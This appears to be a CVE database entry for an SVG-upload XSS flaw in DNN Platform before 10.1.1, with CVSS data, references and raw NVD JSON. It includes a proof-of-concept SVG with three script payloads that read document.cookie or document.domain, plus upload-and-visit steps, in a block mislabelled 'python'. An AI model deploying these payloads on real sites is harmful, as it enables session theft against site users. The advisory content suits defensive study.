CVE-2025-64094

Description

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to 10.1.1, sanitization of the content of uploaded SVG files was not covering all possible XSS scenarios. This vulnerability exists because of an incomplete fix for CVE-2025-48378. This vulnerability is fixed in 10.1.1.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* - VULNERABLE

DNN Platform < 10.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-64094 PoC - Malicious SVG file for XSS -->
<svg xmlns="http://www.w3.org/2000/svg">
  <!-- Basic onload XSS -->
  <script>alert(document.cookie)</script>
  
  <!-- Alternative: using foreignObject to embed HTML with JavaScript -->
  <foreignObject width="100" height="100">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <img src="x" onerror="alert(document.domain)" />
    </div>
  </foreignObject>
  
  <!-- Alternative: using animate to trigger event -->
  <animate onbegin="alert(document.cookie)" attributeName="x" dur="1s" />
</svg>

<!-- Usage: Upload this SVG file to DNN Platform < 10.1.1,
     then access the file URL to trigger XSS payload -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64094
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64094
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64094/
[4] VulDB https://vuldb.com/cve/CVE-2025-64094
[5] https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-hmvq-8p83-cq52

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64094", "sourceIdentifier": "[email protected]", "published": "2025-10-28T22:15:38.240", "lastModified": "2025-11-03T19:38:46.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to 10.1.1, sanitization of the content of uploaded SVG files was not covering all possible XSS scenarios. This vulnerability exists because of an incomplete fix for CVE-2025-48378. This vulnerability is fixed in 10.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.1.1", "matchCriteriaId": "AADA05D8-5532-4750-85C9-7B6F25E3BFD7"}]}]}], "references": [{"url": "https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-hmvq-8p83-cq52", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}